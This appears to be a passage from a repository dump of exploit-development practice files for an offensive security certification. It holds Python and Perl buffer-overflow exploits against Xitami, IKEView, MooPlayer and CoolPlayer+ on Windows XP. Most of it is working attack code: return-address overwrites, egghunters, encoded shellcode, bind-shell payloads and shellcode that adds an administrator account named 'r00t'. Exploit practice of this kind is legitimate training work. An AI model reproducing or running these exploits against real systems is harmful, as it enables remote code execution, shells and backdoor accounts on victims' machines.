36 | s.send(header) 37 | time.sleep(1) 38 | s.close() 39 | 40 | print "[+] Check port 1337 for your shell" 41 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/egghunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | #jmp esp 0x7c86467b in kernel32.dll 20 | 21 | egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02" 22 | "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" 23 | "w00t" # 4 byte tag 24 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") 25 | 26 | buf = "A" * 72 + "\x7b\x46\x86\x7c" + "\xEB\x22" + "\x90" * 50 + egghunt + "w00tw00t" + "\x90" * 50 27 | 28 | header = ( 29 | 'GET / HTTP/1.1\r\n' 30 | 'Host: %s\r\n' 31 | 'If-Modified-Since: pwned, %s\r\n' 32 | '\r\n') % (target, buf) 33 | 34 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 35 | try: 36 | s.connect((target, port)) 37 | print "[+] Connected" 38 | except: 39 | print "[!] Connection Failed" 40 | sys.exit(0) 41 | 42 | print "[+] Sending payload..." 
43 | s.send(header) 44 | time.sleep(1) 45 | s.close() 46 | 47 | print "[+] Check port 1337 for your shell" 48 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/jmpesp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | #jmp esp 0x7c86467b in kernel32.dll 20 | 21 | buf = "A" * 72 + "\x7b\x46\x86\x7c" + "B" * 4 22 | 23 | header = ( 24 | 'GET / HTTP/1.1\r\n' 25 | 'Host: %s\r\n' 26 | 'If-Modified-Since: pwned, %s\r\n' 27 | '\r\n') % (target, buf) 28 | 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | try: 31 | s.connect((target, port)) 32 | print "[+] Connected" 33 | except: 34 | print "[!] Connection Failed" 35 | sys.exit(0) 36 | 37 | print "[+] Sending payload..." 
38 | s.send(header) 39 | time.sleep(1) 40 | s.close() 41 | 42 | print "[+] Check port 1337 for your shell" 43 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Xitami Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./xitami.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq" 20 | 21 | header = ( 22 | 'GET / HTTP/1.1\r\n' 23 | 'Host: %s\r\n' 24 | 'If-Modified-Since: pwned, %s\r\n' 25 | '\r\n') % (target, buf) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | s.connect((target, port)) 30 | print "[+] Connected" 31 | except: 32 | print "[!] Connection Failed" 33 | sys.exit(0) 34 | 35 | print "[+] Sending payload..." 
36 | s.send(header) 37 | time.sleep(1) 38 | s.close() 39 | 40 | print "[+] Check port 1337 for your shell" 41 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/xitami-17361/2nd/xitami.spk: -------------------------------------------------------------------------------- 1 | s_string("GET"); 2 | s_string(" "); 3 | s_string("/favicon.ico"); 4 | s_string("HTTP/1.1"); 5 | s_string("\r\n"); 6 | s_string("Host: "); 7 | s_string("192.168.37.131"); 8 | s_string("\r\n"); 9 | s_string_variable("If-Modified-Since: "); 10 | s_string(Fri, 21 Apr 2000 05:09:44 GMT"); 11 | s_string("\r\n"); -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/ikeview_r60_seh/ikeview_r60_shellcode_bind.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open('key.elg' , 'w'); 4 | 5 | buffer = "A"*4424 6 | nseh = "\xeb\x18\x90\x90" 7 | seh = "\xc0\x28\x40\x00" 8 | nops = "\x90"*30 9 | shellcode = ("\xda\xde\xbe\xa6\x5a\x80\xaa\xd9\x74\x24\xf4\x58\x33\xc9\xb1" 10 | "\x52\x31\x70\x17\x03\x70\x17\x83\x66\x5e\x62\x5f\x9a\xb7\xe0" 11 | "\xa0\x62\x48\x85\x29\x87\x79\x85\x4e\xcc\x2a\x35\x04\x80\xc6" 12 | "\xbe\x48\x30\x5c\xb2\x44\x37\xd5\x79\xb3\x76\xe6\xd2\x87\x19" 13 | "\x64\x29\xd4\xf9\x55\xe2\x29\xf8\x92\x1f\xc3\xa8\x4b\x6b\x76" 14 | "\x5c\xff\x21\x4b\xd7\xb3\xa4\xcb\x04\x03\xc6\xfa\x9b\x1f\x91" 15 | "\xdc\x1a\xf3\xa9\x54\x04\x10\x97\x2f\xbf\xe2\x63\xae\x69\x3b" 16 | "\x8b\x1d\x54\xf3\x7e\x5f\x91\x34\x61\x2a\xeb\x46\x1c\x2d\x28" 17 | "\x34\xfa\xb8\xaa\x9e\x89\x1b\x16\x1e\x5d\xfd\xdd\x2c\x2a\x89" 18 | "\xb9\x30\xad\x5e\xb2\x4d\x26\x61\x14\xc4\x7c\x46\xb0\x8c\x27" 19 | "\xe7\xe1\x68\x89\x18\xf1\xd2\x76\xbd\x7a\xfe\x63\xcc\x21\x97" 20 | "\x40\xfd\xd9\x67\xcf\x76\xaa\x55\x50\x2d\x24\xd6\x19\xeb\xb3" 21 | "\x19\x30\x4b\x2b\xe4\xbb\xac\x62\x23\xef\xfc\x1c\x82\x90\x96" 22 | 
"\xdc\x2b\x45\x38\x8c\x83\x36\xf9\x7c\x64\xe7\x91\x96\x6b\xd8" 23 | "\x82\x99\xa1\x71\x28\x60\x22\xd2\xbd\x23\x32\x42\xbc\xb3\x23" 24 | "\xcf\x49\x55\x29\xff\x1f\xce\xc6\x66\x3a\x84\x77\x66\x90\xe1" 25 | "\xb8\xec\x17\x16\x76\x05\x5d\x04\xef\xe5\x28\x76\xa6\xfa\x86" 26 | "\x1e\x24\x68\x4d\xde\x23\x91\xda\x89\x64\x67\x13\x5f\x99\xde" 27 | "\x8d\x7d\x60\x86\xf6\xc5\xbf\x7b\xf8\xc4\x32\xc7\xde\xd6\x8a" 28 | "\xc8\x5a\x82\x42\x9f\x34\x7c\x25\x49\xf7\xd6\xff\x26\x51\xbe" 29 | "\x86\x04\x62\xb8\x86\x40\x14\x24\x36\x3d\x61\x5b\xf7\xa9\x65" 30 | "\x24\xe5\x49\x89\xff\xad\x7a\xc0\x5d\x87\x12\x8d\x34\x95\x7e" 31 | "\x2e\xe3\xda\x86\xad\x01\xa3\x7c\xad\x60\xa6\x39\x69\x99\xda" 32 | "\x52\x1c\x9d\x49\x52\x35") 33 | ds = "D" * (5000-len(buffer+nseh+seh+nops+shellcode)) 34 | 35 | sploit = buffer + nseh + seh + nops + shellcode + ds 36 | 37 | file.write(sploit) 38 | file.close() 39 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/ikeview_r60_seh/key.elg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp2/ikeview_r60_seh/key.elg -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_crash.m3u: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_eip_crash.m3u: 
-------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9 -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_messagebox.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/MooPlayer_messagebox.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/mooplayer_1.3.0_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | $file = "MooPlayer_crash.m3u"; 4 | 5 | my $junk = "A" x 300; 6 | 7 | open(myfile,">$file") ; 8 | print myfile $junk; 9 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp2/mooplayer_1.3.0/mooplayer_1.3.0_eip_crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | $file = "MooPlayer_eip_crash.m3u"; 4 | 5 | my $junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"; 6 | 7 | open(myfile,">$file") ; 8 | print myfile $junk; 9 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/audiocoder/audiocoder.m3u: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/audiocoder/audiocoder.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_beginning_buffer.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | my $junk = "\xcc" x 260; #offset to EIP 5 | my $eip = pack("V", 0x7c810395); #call ebx from kernel32.dll 6 | 7 | my $sploit = $junk.$eip; #build sploit portion of buffer 8 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 9 | my $buffer = $sploit.$fill; # build final buffer 10 | 11 | # write the exploit buffer to file 12 | 13 | my $file = "coolplayerbegbuffer.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer). "\n"; 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_eip_takeover.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | my $junk = "\x41" x 260; #offset to EIP 5 | my $eip = "\x42" x 4; 6 | 7 | my $sploit = $junk.$eip; #build sploit portion of buffer 8 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 9 | my $buffer = $sploit.$fill; # build final buffer 10 | 11 | # write the exploit buffer to file 12 | 13 | my $file = "coolplayereiptakeover.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . 
$file . "]\n"; 18 | print "Buffer size: " . length($buffer). "\n"; 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_eip_takeover_1.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | my $junk = "\x41" x 219; #offset to EIP 5 | my $eip = "\x42" x 4; 6 | 7 | my $sploit = $junk.$eip; #build sploit portion of buffer 8 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 9 | my $buffer = $sploit.$fill; # build final buffer 10 | 11 | # write the exploit buffer to file 12 | 13 | my $file = "coolplayereiptakeover1.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer). "\n"; 19 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_jmp_ebx.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xc3\x64" x 3; #add 300 to ebx 6 | $jmp = $jmp . 
"\xff\xe3"; # jmp ebx 7 | my $junk = "\x41" x (260 - length($jmp)); #offset to EIP 8 | my $eip = pack("V", 0x7c810395); #call ebx from kernel32.dll 9 | 10 | my $nops = "\xcc" x 50; 11 | my $shell = "\x43" x 200; 12 | 13 | my $sploit = $jmp.$junk.$eip.$nops.$shell; #build sploit portion of buffer 14 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 15 | my $buffer = $sploit.$fill; # build final buffer 16 | 17 | # write the exploit buffer to file 18 | 19 | my $file = "coolplayerjmpebx.m3u"; 20 | open(FILE, ">$file"); 21 | print FILE $buffer; 22 | close(FILE); 23 | print "Exploit file created [" . $file . "]\n"; 24 | print "Buffer size: " . length($buffer). "\n"; 25 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayer_shellcode_calc.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; #set consistent buffer size 4 | 5 | my $jmp = "\x83\xc3\x64" x 3; #add 300 to ebx 6 | $jmp = $jmp . "\xff\xe3"; # jmp ebx 7 | my $junk = "\x41" x (260 - length($jmp)); #offset to EIP 8 | my $eip = pack("V", 0x7c810395); #call ebx from kernel32.dll 9 | 10 | my $nops = "\xcc" x 50; 11 | 12 | #msfvenom -a x86 -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f perl 13 | 14 | my $shell = "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9" . 15 | "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92" . 16 | "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84" . 17 | "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e" . 18 | "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1" . 19 | "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27" . 20 | "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb" . 21 | "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b" . 
22 | "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2" . 23 | "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37" . 24 | "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3" . 25 | "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef" . 26 | "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb" . 27 | "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf" . 28 | "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83" . 29 | "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3" . 30 | "\x9a\xca\xc0"; 31 | 32 | my $sploit = $jmp.$junk.$eip.$nops.$shell; #build sploit portion of buffer 33 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency 34 | my $buffer = $sploit.$fill; # build final buffer 35 | 36 | # write the exploit buffer to file 37 | 38 | my $file = "coolplayershellcodecalc.m3u"; 39 | open(FILE, ">$file"); 40 | print FILE $buffer; 41 | close(FILE); 42 | print "Exploit file created [" . $file . "]\n"; 43 | print "Buffer size: " . length($buffer). 
"\n"; 44 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerbegbuffer.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerbegbuffer.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerjmpebx.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayerjmpebx.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershell_meterp.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershell_meterp.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcode_att.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcode_att.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcodecalc.m3u: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/add(reg)+jmp/coolplayershellcodecalc.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_aadmin.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_aadmin.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_addmin.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | my $junk = "\x4A" x 260; # simulate unusable address containing junk with 'J' 5 | my $eip = pack('V',0x7C924961); # EIP overwrite w/ pop edi pop esi pop ebp from ntdll 6 | my $junk2 = "\x4A" x 12; # simulate unusable address containing junk with 'J' 7 | my $usable_address = pack('V',0x7C86467B); # jmp esp kernel32.dll 8 | my $nops = "\x90" x 20; 9 | 10 | my $shell = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23" . 11 | "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca" . 12 | "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63" . 13 | "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20" . 14 | "\x6e\x65\x74\x20\x75\x73\x65\x72\x20" . 15 | "\x72\x30\x30\x74\x20" . # user: r00t 16 | "\x70\x77\x6e\x64" . # pass: pwnd 17 | "\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e" . 18 | "\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" . 19 | "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69" . 20 | "\x73\x74\x72\x61\x74\x6f\x72\x73\x20". 21 | "\x72\x30\x30\x74" . 
22 | "\x20\x2f\x61\x64\x64\x00"; 23 | 24 | my $sploit = $jmp.$junk.$eip.$junk2.$usable_address.$nops.$shell; # build sploit portion of buffer 25 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 26 | my $buffer = $sploit.$fill; # build final buffer 27 | 28 | # write the exploit buffer to file 29 | my $file = "coolplayer_popret_aadmin.m3u"; 30 | open(FILE, ">$file"); 31 | print FILE $buffer; 32 | close(FILE); 33 | print "Exploit file [" . $file . "] created\n"; 34 | print "Buffer size: " . length($buffer) . "\n"; 35 | 36 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_find.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_find.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/pop+ret/coolplayer_popret_find.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | 5 | my $junk = "\x4A" x 260; # simulate unusable address containing junk with "J" 6 | my $eip = "\x42" x 4; 7 | my $junk2 = "\x4A" x 12; # simulate unusable address containing junk with "J" 8 | my $usable_address = pack("V", 0x7C86467B); # jmp esp kernel32.dll 9 | my $nops = "\x90" x 20; 10 | my $shell = "\xcc" x 500; # simulate shellcode with INT 11 | my $sploit = $jmp.$junk.$eip.$junk2.$usable_address.$nops.$shell; # build sploit portion of buffer 12 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 13 | my $buffer = $sploit.$fill; # build final buffer 14 | 15 | # write the exploit buffer to file 16 | my $file = "coolplayer_popret_find.m3u"; 
17 | open(FILE, ">$file"); 18 | print FILE $buffer; 19 | close(FILE); 20 | print "Exploit file [" . $file . "] created\n"; 21 | print "Buffer size: " . length($buffer) . "\n"; 22 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | my $junk = "\x41" x 260; # offset to EIP 5 | my $eip = pack('V',0x7C93121B); # EIP overwrite w/ popad ret (ntdll) 6 | my $regs = "\x42" x 32; # account for registers populated by popad 7 | my $esp = pack('V',0x7C86467B); # jmp esp kernel32.dll 8 | my $nops = "\x90" x 20; 9 | 10 | # modified messagebox shellcode from Giuseppe D'Amore 11 | my $shell = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" . 12 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" . 13 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" . 14 | "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" . 15 | "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" . 16 | "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4f\x46" . 17 | "\x21\x01\x68\x61\x64\x20\x42\x68\x20\x50\x6f\x70\x89\xe1\xfe" . 
18 | "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; 19 | 20 | my $sploit = $junk.$eip.$regs.$esp.$nops.$shell; # build sploit portion of buffer 21 | my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer 22 | my $buffer = $sploit.$fill; # build final buffer 23 | 24 | 25 | # write the exploit buffer to file 26 | my $file = "coolplayer_popad.m3u"; 27 | open(FILE, ">$file"); 28 | print FILE $buffer; 29 | close(FILE); 30 | print "Exploit file [" . $file . "] created\n"; 31 | print "Buffer size: " . length($buffer) . "\n"; 32 | -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad2.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad2.m3u -------------------------------------------------------------------------------- /BoF/SEH-BoF/windows_xp_sp3/coolplayer+ v2.19.4/popad/coolplayer_popad2.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 10000; # set consistent buffer size 4 | my $junk = "\x41" x 260; # offset to EIP 5 | my $eip = pack('V',0x7C86467B); # EIP overwrite w/ popad ret (ntdll) 6 | my $jmp = "\x61"; # popad 7 | $jmp = $jmp . "\xff\xe4"; 8 | my $regs = "\x42" x 32; # account for registers populated by popad 9 | my $nops = "\x90" x 20; 10 | 11 | # modified messagebox shellcode from Giuseppe D'Amore 12 | my $shell = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" . 13 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" . 14 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" . 15 